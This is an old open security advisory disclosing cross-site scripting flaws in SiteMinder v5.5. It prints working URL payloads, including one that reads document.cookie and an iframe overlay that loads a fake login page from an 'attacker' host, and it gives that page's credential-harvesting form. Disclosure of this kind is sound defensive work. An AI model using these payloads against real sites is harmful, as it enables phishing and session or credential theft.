SiteMinder Multiple Vulnerabilities
/*
*****************************************************************************************************************
$ An open security advisory #10 - Siteminder v5.5 Vulnerabilities
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 08 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Remote
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial
gain.
*****************************************************************************************************************
Siteminder
http://www3.ca.com/Solutions/Product.asp?ID=5262
"eTrust? SiteMinder® is a market-leading, security and management foundation
for enterprise Web
applications with a centralized security infrastructure for managing user
authentication and
access. eTrust SiteMinder delivers the market?s most advanced security
management capabilities
and enterprise-class site administration, reducing overall IT operational
cost and complexity.
eTrust SiteMinder enables the secure delivery of essential information and
applications to
employees, partners, suppliers and customers, and scales with growing
business needs.."
Siteminder is vulnerable to XSS whereby a user can tag HTML or javascript on
to various locations
in a URL or input field and have the script run in the local users browser.
This can be used to
perform phishing attacks, hijack users browser sessions or user account
information by redrawing
the login page of a site.
http://vuln/siteminderagent/pwcgi/smpwservicescgi.exe?SMAUTHREASON=0&TARGET=&USERNAME=hacker&
PASSWORD="><script>alert(document.cookie)</script>&BUFFER="><script>alert("Vulnerable")</script>
The following link will abuse the URL option by first logging the user out of
the site with a
timeout error, due to the fact that we send her off to another HTTPS site,
taking the user back to
the login page. Next, we open an IFRAME over the original login fields with
malicious Username and
Password input fields, whereby a user will then supply their login details to
a malicious site,
to be later harvested and used in an attack.
http://site.com/siteminderagent/forms/login.fcc?TYPE=1&REALMOID=01-000000000-000000-0010-
0000-0000000000000&GUID=&SMAUTHREASON=32&TARGET=http://site.com/servlet/yum/eat/user.html">
<iframe bgcolor="white" src="https://attacker/snoop.html" style="position:
absolute; top:
270px; left: 15 px;"></iframe><iframe src="https://attacker/snoop.html"
style="position:
absolute; top: 270px; left: 15 px;"></iframe>
To test if you are vulnerable to this issue, you can tag the following on to
the end of a
siteminder URL. If it is successful, you should see the Google homepage
within an IFRAME.
"><iframe bgcolor="white" src="http://www.google.com" style="position:
absolute; top: 270px;
left: 15 px;"></iframe><iframe src="http://www.google.com" style="position:
absolute; top:
270px; left: 15 px;"></iframe>
/* snoop.html */
<html>
</head></head>
<body>
<form>
User ID
<input type="text" name="UserID">
<br>
Password:
<input type="text" name="Password">
<input type="submit" value="Submit">
</form>
</body>
</html>
I have contacted Netegrity via ca.com multiple times but received no
response, as such, users
should use a filtering technology like modsecurity to detect the above
descibed attacks until
a fix has been released.